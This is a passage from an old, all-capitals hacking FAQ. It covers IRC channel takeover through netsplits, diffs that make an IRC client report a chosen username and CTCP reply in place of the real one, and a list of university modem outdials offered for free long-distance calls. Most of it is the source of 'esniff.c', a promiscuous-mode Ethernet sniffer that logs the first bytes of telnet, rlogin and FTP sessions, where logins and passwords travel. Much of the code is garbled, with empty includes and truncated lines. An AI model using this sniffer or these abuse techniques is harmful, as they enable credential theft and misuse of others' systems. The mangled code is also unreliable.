THAT SERVER RECONNECTS TO THE NET, YOU WILL HAVE CHANOP ON THE REAL
|
|||
|
CHANNEL. IF YOU HAVE SERVEROP ON A SERVER, YOU CAN CAUSE IT TO SPLIT
|
|||
|
ON PURPOSE.
|
|||
|
|
|||
|
|
|||
|
15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME?
|
|||
|
|
|||
|
GET THE IRC CLIENT FROM CS.BU.EDU /IRC/CLIENTS. LOOK AT THE SOURCE
|
|||
|
|
|||
|
#hack FAQ (36/609)
|
|||
|
CODE FILES IRC.C AND CTCP.C. THE CODE YOU ARE LOOKING FOR IS FAIRLY
|
|||
|
EASY TO SPOT. CHANGE IT. CHANGE THE USERNAME CODE IN IRC.C AND THE
|
|||
|
CTCP INFORMATION CODE IN CTCP.C. COMPILE AND RUN YOUR CLIENT.
|
|||
|
|
|||
|
HERE ARE THE DIFFS FROM A SAMPLE HACK OF THE IRC CLIENT. YOUR CLIENT
|
|||
|
CODE WILL VARY SLIGHTLY DEPENDING ON WHAT IRC CLIENT VERSION YOU ARE
|
|||
|
RUNNING.
|
|||
|
|
|||
|
*** CTCP.C.OLD WED FEB 10 10:08:05 1993
|
|||
|
--- CTCP.C FRI FEB 12 04:33:55 1993
|
|||
|
***************
|
|||
|
*** 331,337 ****
|
|||
|
|
|||
|
STRUCT PASSWD *PWD;
|
|||
|
|
|||
|
LONG DIFF;
|
|||
|
|
|||
|
INT UID;
|
|||
|
! CHAR C;
|
|||
|
|
|||
|
|
|||
|
/*
|
|||
|
|
|||
|
#hack FAQ (37/632)
|
|||
|
* SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS'
|
|||
|
--- 331,337 ----
|
|||
|
|
|||
|
STRUCT PASSWD *PWD;
|
|||
|
|
|||
|
LONG DIFF;
|
|||
|
|
|||
|
INT UID;
|
|||
|
! CHAR C, *FING;
|
|||
|
|
|||
|
|
|||
|
/*
|
|||
|
|
|||
|
* SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS'
|
|||
|
***************
|
|||
|
*** 348,354 ****
|
|||
|
|
|||
|
IF (UID != DAEMON_UID)
|
|||
|
|
|||
|
{
|
|||
|
#ENDIF /* DAEMON_UID */
|
|||
|
! IF (PWD = GETPWUID(UID))
|
|||
|
|
|||
|
#hack FAQ (39/656)
|
|||
|
{
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CHAR *TMP;
|
|||
|
|
|||
|
--- 348,356 ----
|
|||
|
|
|||
|
IF (UID != DAEMON_UID)
|
|||
|
|
|||
|
{
|
|||
|
#ENDIF /* DAEMON_UID */
|
|||
|
! IF (FING = GETENV("IRCFINGER"))
|
|||
|
! SEND_CTCP_REPLY(FROM, CTCP->NAME, FING, DIFF, C);
|
|||
|
! ELSE IF (PWD = GETPWUID(UID))
|
|||
|
|
|||
|
|
|||
|
{
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CHAR *TMP;
|
|||
|
|
|||
|
#hack FAQ (40/679)
|
|||
|
*** IRC.C.OLD WED FEB 10 06:33:11 1993
|
|||
|
--- IRC.C FRI FEB 12 04:02:11 1993
|
|||
|
***************
|
|||
|
*** 510,516 ****
|
|||
|
|
|||
|
|
|||
|
MALLOC_STRCPY(&MY_PATH, "/");
|
|||
|
|
|||
|
IF (*REALNAME == NULL(CHAR))
|
|||
|
|
|||
|
|
|||
|
STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN);
|
|||
|
! IF (*USERNAME == NULL(CHAR))
|
|||
|
|
|||
|
{
|
|||
|
|
|||
|
|
|||
|
IF (PTR = GETENV("USER"))
|
|||
|
|
|||
|
|
|||
|
|
|||
|
STRMCPY(USERNAME, PTR, NAME_LEN);
|
|||
|
|
|||
|
#hack FAQ (40/701)
|
|||
|
--- 510,518 ----
|
|||
|
|
|||
|
|
|||
|
MALLOC_STRCPY(&MY_PATH, "/");
|
|||
|
|
|||
|
IF (*REALNAME == NULL(CHAR))
|
|||
|
|
|||
|
|
|||
|
STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN);
|
|||
|
! IF (PTR = GETENV("IRCUSER"))
|
|||
|
! STRMCPY(USERNAME, PTR, NAME_LEN);
|
|||
|
! ELSE IF (*USERNAME == NULL(CHAR))
|
|||
|
|
|||
|
{
|
|||
|
|
|||
|
|
|||
|
IF (PTR = GETENV("USER"))
|
|||
|
|
|||
|
|
|||
|
|
|||
|
STRMCPY(USERNAME, PTR, NAME_LEN);
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (41/724)
|
|||
|
16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM?
|
|||
|
|
|||
|
THESE DIRECTORIES ARE OFTEN USED BY PEOPLE TRYING TO HIDE INFORMATION,
|
|||
|
MOST OFTEN WAREZ (COMMERCIAL SOFTWARE).
|
|||
|
|
|||
|
THERE ARE SEVERAL THINGS YOU CAN DO TO DETERMINE WHAT THESE STRANGE
|
|||
|
CHARACTERS ARE. ONE IS TO USE THE ARGUMENTS TO THE LS COMMAND THAT
|
|||
|
CAUSE LS TO GIVE YOU MORE INFORMATION:
|
|||
|
|
|||
|
FROM THE MAN PAGE FOR LS:
|
|||
|
|
|||
|
-F CAUSES DIRECTORIES TO BE MARKED WITH A TRAILING ``/'',
|
|||
|
|
|||
|
EXECUTABLE FILES TO BE MARKED WITH A TRAILING ``*'', AND
|
|||
|
|
|||
|
SYMBOLIC LINKS TO BE MARKED WITH A TRAILING ``@'' SYMBOL.
|
|||
|
|
|||
|
-Q FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN FILENAMES AS THE
|
|||
|
|
|||
|
CHARACTER ``?''.
|
|||
|
|
|||
|
-B FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN THE \DDD
|
|||
|
|
|||
|
#hack FAQ (42/747)
|
|||
|
NOTATION, IN OCTAL.
|
|||
|
|
|||
|
PERHAPS THE MOST USEFUL TOOL IS TO SIMPLY DO AN "LS -AL FILENAME" TO
|
|||
|
SAVE THE DIRECTORY OF THE REMOTE FTP SITE AS A FILE ON YOUR LOCAL
|
|||
|
MACHINE. THEN YOU CAN DO A "CAT -T -V -E FILENAME" TOO SEE EXACTLY
|
|||
|
WHAT THOSE BIZARRE LITTLE CHARACTERS ARE.
|
|||
|
|
|||
|
FROM THE MAN PAGE FOR CAT:
|
|||
|
|
|||
|
-V CAUSES NON-PRINTING CHARACTERS (WITH THE EXCEPTION OF TABS,
|
|||
|
|
|||
|
NEWLINES, AND FORM FEEDS) TO BE DISPLAYED. CONTROL CHARACTERS
|
|||
|
|
|||
|
ARE DISPLAYED AS ^X (X), WHERE X IS THE KEY PRESSED WITH
|
|||
|
|
|||
|
THE KEY (FOR EXAMPLE, M IS DISPLAYED AS ^M). THE
|
|||
|
|
|||
|
CHARACTER (OCTAL 0177) IS PRINTED AS ^?. NON-ASCII
|
|||
|
|
|||
|
CHARACTERS (WITH THE HIGH BIT SET) ARE PRINTED AS M -X, WHERE
|
|||
|
|
|||
|
X IS THE CHARACTER SPECIFIED BY THE SEVEN LOW ORDER BITS.
|
|||
|
|
|||
|
#hack FAQ (43/770)
|
|||
|
-T CAUSES TABS TO BE PRINTED AS ^I AND FORM FEEDS AS ^L. THIS
|
|||
|
|
|||
|
OPTION IS IGNORED IF THE -V OPTION IS NOT SPECIFIED.
|
|||
|
|
|||
|
-E CAUSES A ``$'' CHARACTER TO BE PRINTED AT THE END OF EACH LINE
|
|||
|
|
|||
|
(PRIOR TO THE NEW-LINE). THIS OPTION IS IGNORED IF THE -V
|
|||
|
|
|||
|
OPTION IS NOT SET.
|
|||
|
|
|||
|
IF THE DIRECTORY NAME INCLUDES A OR A YOU WILL NEED TO
|
|||
|
ENCLOSE THE ENTIRE DIRECTORY NAME IN QUOTES. EXAMPLE:
|
|||
|
|
|||
|
CD ".."
|
|||
|
|
|||
|
ON AN IBM-PC, YOU MAY ENTER THESE SPECIAL CHARACTERS BY HOLDING DOWN
|
|||
|
THE KEY AND ENTERING THE DECIMAL VALUE OF THE SPECIAL CHARACTER
|
|||
|
ON YOUR NUMERIC KEYPAD. WHEN YOU RELEASE THE KEY, THE SPECIAL
|
|||
|
CHARACTER SHOULD APPEAR ON YOUR SCREEN. AN ASCII CHART CAN BE VERY
|
|||
|
HELPFUL.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/792)
|
|||
|
17. WHAT IS ETHERNET SNIFFING?
|
|||
|
|
|||
|
ETHERNET SNIFFING IS LISTENING (WITH SOFTWARE) TO THE RAW ETHERNET
|
|||
|
DEVICE FOR PACKETS THAT INTEREST YOU. WHEN YOUR SOFTWARE SEES A
|
|||
|
PACKET THAT FITS CERTAIN CRITERIA, IT LOGS IT TO A FILE. THE MOST
|
|||
|
COMMON CRITERIA FOR AN INTERESTING PACKET IS ONE THAT CONTAINS WORDS
|
|||
|
LIKE "LOGIN" OR "PASSWORD."
|
|||
|
|
|||
|
MANY ETHERNET SNIFFERS ARE AVAILABLE, HERE ARE A FEW THAT MAY BE ON
|
|||
|
YOUR SYSTEM NOW:
|
|||
|
|
|||
|
OS SNIFFER
|
|||
|
~~ ~~~~~~~
|
|||
|
HP/UX NETTL (MONITOR) & NETFMT (DISPLAY)
|
|||
|
NFSWATCH /* AVAILABLE VIA ANONYMOUS FTP */
|
|||
|
IRIX NFSWATCH /* AVAILABLE VIA ANONYMOUS FTP */
|
|||
|
SUNOS ETHERFIND
|
|||
|
NFSWATCH /* AVAILABLE VIA ANONYMOUS FTP */
|
|||
|
SOLARIS SNOOP
|
|||
|
DOS ETHLOAD /* AVAILABLE VIA ANONYMOUS FTP */
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/814)
|
|||
|
LANWATCH
|
|||
|
THE GOBBLER
|
|||
|
|
|||
|
|
|||
|
NETMON
|
|||
|
NETZHACK /* MISTRESS.INFORMATIK.UNIBW-MUENCHEN.DE */
|
|||
|
/* /PUB/NETZHACK.MAC */
|
|||
|
LANPATROL
|
|||
|
|
|||
|
|
|||
|
NETWATCH
|
|||
|
|
|||
|
HERE IS SOURCE CODE FOR AN ETHERNET SNIFFER:
|
|||
|
|
|||
|
/* ESNIFF.C */
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#hack FAQ (43/836)
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/858)
|
|||
|
#INCLUDE
|
|||
|
#INCLUDE
|
|||
|
|
|||
|
#DEFINE ERR STDERR
|
|||
|
|
|||
|
CHAR *MALLOC();
|
|||
|
CHAR *DEVICE,
|
|||
|
*PROGNAME,
|
|||
|
*LOGNAME;
|
|||
|
FILE *LOG;
|
|||
|
INT DEBUG=0;
|
|||
|
|
|||
|
#DEFINE NIT_DEV "/DEV/NIT"
|
|||
|
#DEFINE CHUNKSIZE 4096 /* DEVICE BUFFER SIZE */
|
|||
|
INT IF_FD = -1;
|
|||
|
INT PACKET[CHUNKSIZE+32];
|
|||
|
|
|||
|
VOID PEXIT(ERR,MSG)
|
|||
|
INT ERR; CHAR *MSG;
|
|||
|
{ PERROR(MSG);
|
|||
|
EXIT(ERR); }
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/880)
|
|||
|
VOID ZEXIT(ERR,MSG)
|
|||
|
INT ERR; CHAR *MSG;
|
|||
|
{ FPRINTF(ERR,MSG);
|
|||
|
EXIT(ERR); }
|
|||
|
|
|||
|
#DEFINE IP ((STRUCT IP *)PACKET)
|
|||
|
#DEFINE IP_OFFSET (0X1FFF)
|
|||
|
#DEFINE SZETH (SIZEOF(STRUCT ETHER_HEADER))
|
|||
|
#DEFINE IPLEN (NTOHS(IP->IP_LEN))
|
|||
|
#DEFINE IPHLEN (IP->IP_HL)
|
|||
|
#DEFINE TCPOFF (TCPH->TH_OFF)
|
|||
|
#DEFINE IPS (IP->IP_SRC)
|
|||
|
#DEFINE IPD (IP->IP_DST)
|
|||
|
#DEFINE TCPS (TCPH->TH_SPORT)
|
|||
|
#DEFINE TCPD (TCPH->TH_DPORT)
|
|||
|
#DEFINE IPEQ(S,T) ((S).S_ADDR == (T).S_ADDR)
|
|||
|
|
|||
|
#DEFINE TCPFL(FLAGS) (TCPH->TH_FLAGS & (FLAGS))
|
|||
|
|
|||
|
#DEFINE MAXBUFLEN (128)
|
|||
|
TIME_T LASTTIME = 0;
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/902)
|
|||
|
STRUCT CREC {
|
|||
|
STRUCT CREC *NEXT,
|
|||
|
*LAST;
|
|||
|
TIME_T TIME; /* START TIME */
|
|||
|
STRUCT IN_ADDR SRCIP,
|
|||
|
DSTIP;
|
|||
|
U_INT SRCPORT, /* SRC/DST PORTS */
|
|||
|
DSTPORT;
|
|||
|
U_CHAR DATA[MAXBUFLEN+2]; /* IMPORTANT STUFF :-) */
|
|||
|
U_INT LENGTH; /* CURRENT DATA LENGTH */
|
|||
|
U_INT PKCNT; /* # PKTS */
|
|||
|
U_LONG LASTSEQ;
|
|||
|
};
|
|||
|
|
|||
|
STRUCT CREC *CLROOT = NULL;
|
|||
|
|
|||
|
CHAR *SYMADDR(IP)
|
|||
|
REGISTER STRUCT IN_ADDR IP;
|
|||
|
{ REGISTER STRUCT HOSTENT *HE =
|
|||
|
GETHOSTBYADDR((CHAR *)&IP.S_ADDR, SIZEOF(STRUCT IN_ADDR),AF_INET);
|
|||
|
|
|||
|
RETURN( (HE)?(HE->H_NAME):(INET_NTOA(IP)) );
|
|||
|
|
|||
|
#hack FAQ (43/924)
|
|||
|
}
|
|||
|
|
|||
|
CHAR *TCPFLAGS(FLGS)
|
|||
|
REGISTER U_CHAR FLGS;
|
|||
|
{ STATIC CHAR IOBUF[8];
|
|||
|
#DEFINE SFL(P,THF,C) IOBUF[P]=((FLGS & THF)?C:'-')
|
|||
|
|
|||
|
SFL(0,TH_FIN, 'F');
|
|||
|
SFL(1,TH_SYN, 'S');
|
|||
|
SFL(2,TH_RST, 'R');
|
|||
|
SFL(3,TH_PUSH,'P');
|
|||
|
SFL(4,TH_ACK, 'A');
|
|||
|
SFL(5,TH_URG, 'U');
|
|||
|
IOBUF[6]=0;
|
|||
|
RETURN(IOBUF);
|
|||
|
}
|
|||
|
|
|||
|
CHAR *SERVP(PORT)
|
|||
|
REGISTER U_INT PORT;
|
|||
|
{ STATIC CHAR BUF[10];
|
|||
|
REGISTER CHAR *P;
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (43/946)
|
|||
|
SWITCH(PORT) {
|
|||
|
CASE IPPORT_LOGINSERVER: P="RLOGIN"; BREAK;
|
|||
|
CASE IPPORT_TELNET: P="TELNET"; BREAK;
|
|||
|
CASE IPPORT_SMTP: P="SMTP"; BREAK;
|
|||
|
CASE IPPORT_FTP: P="FTP"; BREAK;
|
|||
|
DEFAULT: SPRINTF(BUF,"%U",PORT); P=BUF; BREAK;
|
|||
|
}
|
|||
|
RETURN(P);
|
|||
|
}
|
|||
|
|
|||
|
CHAR *PTM(T)
|
|||
|
REGISTER TIME_T *T;
|
|||
|
{ REGISTER CHAR *P = CTIME(T);
|
|||
|
P[STRLEN(P)-6]=0; /* STRIP " YYYY\N" */
|
|||
|
RETURN(P);
|
|||
|
}
|
|||
|
|
|||
|
CHAR *NOWTM()
|
|||
|
{ TIME_T TM;
|
|||
|
TIME(&TM);
|
|||
|
RETURN( PTM(&TM) );
|
|||
|
}
|
|||
|
|
|||
|
#hack FAQ (44/969)
|
|||
|
#DEFINE MAX(A,B) (((A)>(B))?(A):(B))
|
|||
|
#DEFINE MIN(A,B) (((A)TIME) ); \
|
|||
|
CLTMP->SRCIP.S_ADDR = SIP.S_ADDR; \
|
|||
|
CLTMP->DSTIP.S_ADDR = DIP.S_ADDR; \
|
|||
|
CLTMP->SRCPORT = SPORT; \
|
|||
|
CLTMP->DSTPORT = DPORT; \
|
|||
|
CLTMP->LENGTH = MIN(LEN,MAXBUFLEN); \
|
|||
|
BCOPY( (U_CHAR *)DATA, (U_CHAR *)CLTMP->DATA, CLTMP->LENGTH); \
|
|||
|
CLTMP->PKCNT = 1; \
|
|||
|
CLTMP->NEXT = CLROOT; \
|
|||
|
CLTMP->LAST = NULL; \
|
|||
|
CLROOT = CLTMP; \
|
|||
|
}
|
|||
|
|
|||
|
REGISTER STRUCT CREC *GET_NODE(SIP,SP,DIP,DP)
|
|||
|
REGISTER STRUCT IN_ADDR SIP,DIP;
|
|||
|
REGISTER U_INT SP,DP;
|
|||
|
{ REGISTER STRUCT CREC *CLR = CLROOT;
|
|||
|
|
|||
|
WHILE(CLR != NULL) {
|
|||
|
IF( (CLR->SRCPORT == SP) && (CLR->DSTPORT == DP) &&
|
|||
|
IPEQ(CLR->SRCIP,SIP) && IPEQ(CLR->DSTIP,DIP) )
|
|||
|
|
|||
|
#hack FAQ (44/991)
|
|||
|
BREAK;
|
|||
|
CLR = CLR->NEXT;
|
|||
|
}
|
|||
|
RETURN(CLR);
|
|||
|
}
|
|||
|
|
|||
|
#DEFINE ADDDATA_NODE(CL,DATA,LEN) { \
|
|||
|
BCOPY((U_CHAR *)DATA, (U_CHAR *)&CL->DATA[CL->LENGTH],LEN); \
|
|||
|
CL->LENGTH += LEN; \
|
|||
|
}
|
|||
|
|
|||
|
#DEFINE PR_DATA(DP,LN) { \
|
|||
|
REGISTER U_CHAR LASTC=0; \
|
|||
|
WHILE(LN-- >0) { \
|
|||
|
IF(*DP TIME));
|
|||
|
FPRINTF(LOG," PATH: %S(%S) =>", SYMADDR(CLE->SRCIP),SERVP(CLE->SRCPORT));
|
|||
|
FPRINTF(LOG," %S(%S)\N", SYMADDR(CLE->DSTIP),SERVP(CLE->DSTPORT));
|
|||
|
FPRINTF(LOG," STAT: %S, %D PKTS, %D BYTES [%S]\N",
|
|||
|
NOWTM(),CLE->PKCNT,(CLE->LENGTH+DL),MSG);
|
|||
|
FPRINTF(LOG," DATA: ");
|
|||
|
{ REGISTER U_INT I = CLE->LENGTH;
|
|||
|
REGISTER U_CHAR *P = CLE->DATA;
|
|||
|
|
|||
|
#hack FAQ (44/1013)
|
|||
|
PR_DATA(P,I);
|
|||
|
PR_DATA(D,DL);
|
|||
|
}
|
|||
|
|
|||
|
FPRINTF(LOG,"\N-- \N");
|
|||
|
FFLUSH(LOG);
|
|||
|
|
|||
|
IF(CLE->NEXT != NULL)
|
|||
|
CLE->NEXT->LAST = CLE->LAST;
|
|||
|
IF(CLE->LAST != NULL)
|
|||
|
CLE->LAST->NEXT = CLE->NEXT;
|
|||
|
ELSE
|
|||
|
CLROOT = CLE->NEXT;
|
|||
|
FREE(CLE);
|
|||
|
}
|
|||
|
|
|||
|
/* 30 MINS (X 60 SECONDS) */
|
|||
|
#DEFINE IDLE_TIMEOUT 1800
|
|||
|
#DEFINE IDLE_NODE() { \
|
|||
|
TIME_T TM; \
|
|||
|
TIME(&TM); \
|
|||
|
IF(LASTTIMENEXT; \
|
|||
|
|
|||
|
#hack FAQ (44/1035)
|
|||
|
IF(CLE->TIME ETHER_TYPE);
|
|||
|
|
|||
|
IF(ETHERTYPE IP_P != IPPROTO_TCP) /* CHUK NON TCP PKTS */
|
|||
|
RETURN;
|
|||
|
TCPH = (STRUCT TCPHDR *)(PACKET + IPHLEN);
|
|||
|
|
|||
|
IF(!( (TCPD == IPPORT_TELNET) ||
|
|||
|
(TCPD == IPPORT_LOGINSERVER) ||
|
|||
|
(TCPD == IPPORT_FTP)
|
|||
|
)) RETURN;
|
|||
|
|
|||
|
{ REGISTER STRUCT CREC *CLM;
|
|||
|
REGISTER INT LENGTH = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
|
|||
|
REGISTER U_CHAR *P = (U_CHAR *)PACKET;
|
|||
|
|
|||
|
P += ((IPHLEN * 4) + (TCPOFF * 4));
|
|||
|
|
|||
|
IF(DEBUG) {
|
|||
|
FPRINTF(LOG,"PKT: (%S %04X) ", TCPFLAGS(TCPH->TH_FLAGS),LENGTH);
|
|||
|
FPRINTF(LOG,"%S[%S] => ", INET_NTOA(IPS),SERVP(TCPS));
|
|||
|
FPRINTF(LOG,"%S[%S]\N", INET_NTOA(IPD),SERVP(TCPD));
|
|||
|
}
|
|||
|
|
|||
|
#hack FAQ (45/1058)
|
|||
|
IF( CLM = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
|
|||
|
|
|||
|
CLM->PKCNT++;
|
|||
|
|
|||
|
IF(LENGTH>0)
|
|||
|
IF( (CLM->LENGTH + LENGTH) %S\N",NOWTM());
|
|||
|
FFLUSH(LOG);
|
|||
|
IF(LOG != STDOUT)
|
|||
|
FCLOSE(LOG);
|
|||
|
EXIT(1);
|
|||
|
}
|
|||
|
|
|||
|
/* OPENS NETWORK INTERFACE, PERFORMS IOCTLS AND READS FROM IT,
|
|||
|
* PASSING DATA TO FILTER FUNCTION
|
|||
|
*/
|
|||
|
VOID DO_IT()
|
|||
|
{
|
|||
|
INT CC;
|
|||
|
CHAR *BUF;
|
|||
|
U_SHORT SP_TS_LEN;
|
|||
|
|
|||
|
IF(!(BUF=MALLOC(CHUNKSIZE)))
|
|||
|
|
|||
|
#hack FAQ (45/1080)
|
|||
|
PEXIT(1,"ETH: MALLOC");
|
|||
|
|
|||
|
/* THIS /DEV/NIT INITIALIZATION CODE PINCHED FROM ETHERFIND */
|
|||
|
{
|
|||
|
STRUCT STRIOCTL SI;
|
|||
|
STRUCT IFREQ IFR;
|
|||
|
STRUCT TIMEVAL TIMEOUT;
|
|||
|
U_INT CHUNKSIZE = CHUNKSIZE;
|
|||
|
U_LONG IF_FLAGS = NI_PROMISC;
|
|||
|
|
|||
|
IF((IF_FD = OPEN(NIT_DEV, O_RDONLY)) = 0) {
|
|||
|
REGISTER CHAR *BP = BUF,
|
|||
|
*BUFSTOP = (BUF + CC);
|
|||
|
|
|||
|
WHILE (BP NHB_TOTLEN;
|
|||
|
FILTER(CP, (U_LONG)HDRP->NHB_MSGLEN);
|
|||
|
}
|
|||
|
}
|
|||
|
PEXIT((-1),"ETH: READ");
|
|||
|
}
|
|||
|
/* AUTHORIZE YOUR PROOGIE,GENERATE YOUR OWN PASSWORD AND UNCOMMENT HERE */
|
|||
|
/* #DEFINE AUTHPASSWD "ELOIZGZEJWYMS" */
|
|||
|
|
|||
|
#hack FAQ (46/1103)
|
|||
|
VOID GETAUTH()
|
|||
|
{ CHAR *BUF,*GETPASS(),*CRYPT();
|
|||
|
CHAR PWD[21],PRMPT[81];
|
|||
|
|
|||
|
STRCPY(PWD,AUTHPASSWD);
|
|||
|
SPRINTF(PRMPT,"(%S)UP? ",PROGNAME);
|
|||
|
BUF=GETPASS(PRMPT);
|
|||
|
IF(STRCMP(PWD,CRYPT(BUF,PWD)))
|
|||
|
EXIT(1);
|
|||
|
}
|
|||
|
*/
|
|||
|
VOID MAIN(ARGC, ARGV)
|
|||
|
INT ARGC;
|
|||
|
CHAR **ARGV;
|
|||
|
{
|
|||
|
CHAR CBUF[BUFSIZ];
|
|||
|
STRUCT IFCONF IFC;
|
|||
|
INT S,
|
|||
|
AC=1,
|
|||
|
BACKG=0;
|
|||
|
|
|||
|
PROGNAME=ARGV[0];
|
|||
|
|
|||
|
#hack FAQ (47/1126)
|
|||
|
/* GETAUTH(); */
|
|||
|
|
|||
|
LOG=NULL;
|
|||
|
DEVICE=NULL;
|
|||
|
WHILE((ACIFR_NAME;
|
|||
|
}
|
|||
|
|
|||
|
FPRINTF(ERR,"USING LOGICAL DEVICE %S [%S]\N",DEVICE,NIT_DEV);
|
|||
|
FPRINTF(ERR,"OUTPUT TO %S.%S%S",(LOG)?LOGNAME:"STDOUT",
|
|||
|
(DEBUG)?" (DEBUG)":"",(BACKG)?" BACKGROUNDING ":"\N");
|
|||
|
|
|||
|
IF(!LOG)
|
|||
|
LOG=STDOUT;
|
|||
|
|
|||
|
SIGNAL(SIGINT, DEATH);
|
|||
|
SIGNAL(SIGTERM,DEATH);
|
|||
|
SIGNAL(SIGKILL,DEATH);
|
|||
|
SIGNAL(SIGQUIT,DEATH);
|
|||
|
|
|||
|
IF(BACKG && DEBUG) {
|
|||
|
FPRINTF(ERR,"[CANNOT BG WITH DEBUG ON]\N");
|
|||
|
BACKG=0;
|
|||
|
|
|||
|
#hack FAQ (47/1148)
|
|||
|
}
|
|||
|
|
|||
|
IF(BACKG) {
|
|||
|
REGISTER INT S;
|
|||
|
|
|||
|
IF((S=FORK())>0) {
|
|||
|
FPRINTF(ERR,"[PID %D]\N",S);
|
|||
|
EXIT(0);
|
|||
|
} ELSE IF(S0 ) {
|
|||
|
IOCTL(S,TIOCNOTTY,(CHAR *)NULL);
|
|||
|
CLOSE(S);
|
|||
|
}
|
|||
|
}
|
|||
|
FPRINTF(LOG,"\NLOG STARTED AT => %S [PID %D]\N",NOWTM(),GETPID());
|
|||
|
FFLUSH(LOG);
|
|||
|
|
|||
|
DO_IT();
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
18. WHAT IS AN INTERNET OUTDIAL?
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (47/1170)
|
|||
|
AN INTERNET OUTDIAL IS A MODEM CONNECTED TO THE INTERNET THAN YOU CAN
|
|||
|
USE TO DIAL OUT. NORMAL OUTDIALS WILL ONLY CALL LOCAL NUMBERS. A GOD
|
|||
|
(GLOBAL OUTDIAL) IS CAPABLE OF CALLING LONG DISTANCE. OUTDIALS ARE AN
|
|||
|
INEXPENSIVE METHOD OF CALLING LONG DISTANCE BBS'S.
|
|||
|
|
|||
|
|
|||
|
19. WHAT ARE SOME INTERNET OUTDIALS?
|
|||
|
|
|||
|
|
|||
|
AREA ADDRESS(S) COMMAND(S)
|
|||
|
------ ------------------------------- ---------------------
|
|||
|
201 128.112.88.0
|
|||
|
|
|||
|
128.112.88.1
|
|||
|
|
|||
|
128.112.88.2
|
|||
|
|
|||
|
128.112.88.3
|
|||
|
204 UMNET.CC.MANITOBA.CA "DIAL12" OR "DIAL24"
|
|||
|
206 DIALOUT24.CAC.WASHINGTON.EDU
|
|||
|
215 WISEOWL.OCIS.TEMPLE.EDU ATZ
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (51/1196)
|
|||
|
ATDT 9XXXYYYY
|
|||
|
|
|||
|
129.72.1.59 HAYES COMPAT
|
|||
|
218 AA28.D.UMN.EDU CLI
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
RLOGIN MODEM
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
AT "LOGIN:" TYPE
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
"MODEM"
|
|||
|
|
|||
|
#hack FAQ (52/1219)
|
|||
|
MODEM.D.UMN.EDU "HAYES"
|
|||
|
232 ISN.RDNS.IASTATE.EDU MODEM [WORKS!!]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATZ
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATDT8XXX-XXXX
|
|||
|
303 129.82.100.64 LOGIN: MODEM [NEED PASSWORD!]
|
|||
|
307 MODEM.UWYO.EDU
|
|||
|
|
|||
|
129.72.1.59 HAYES COMPAT
|
|||
|
313 35.1.1.6 "DIAL2400-AA" OR [CAN'T CONNECT]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (54/1243)
|
|||
|
"DIAL1200-AA"
|
|||
|
315 198.36.22.3 "MODEM"
|
|||
|
404 EMORY.EDU .MODEM8 OR
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.DIALOUT
|
|||
|
|
|||
|
BROADBAND.CC.EMORY.EDU .MODEM8 OR
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.DIALOUT
|
|||
|
|
|||
|
128.140.1.239 .MODEM8|CR
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (56/1267)
|
|||
|
OR .MODEM96|CR
|
|||
|
412 GATE.CIS.PITT.EDU LAT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CONNECT DIALOUT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
^E
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATDT 91K XXX-XXXX
|
|||
|
415 128.32.132.250 "DIAL1" OR "DIAL2"
|
|||
|
416 PACX.UTCS.UTORONTO.CA MODEM
|
|||
|
|
|||
|
#hack FAQ (61/1294)
|
|||
|
ATDT 9XXX-XXXX
|
|||
|
502 UKNET.UKY.EDU OUTDIAL2400
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ATDT 9XXX-XXXX
|
|||
|
510 ANNEX132-1.EECS.BERKELEY.EDU ATDT 9,,,,, XXX-XXXX
|
|||
|
514 132.204.2.11 EXTERNE#9 9XXX-XXXX
|
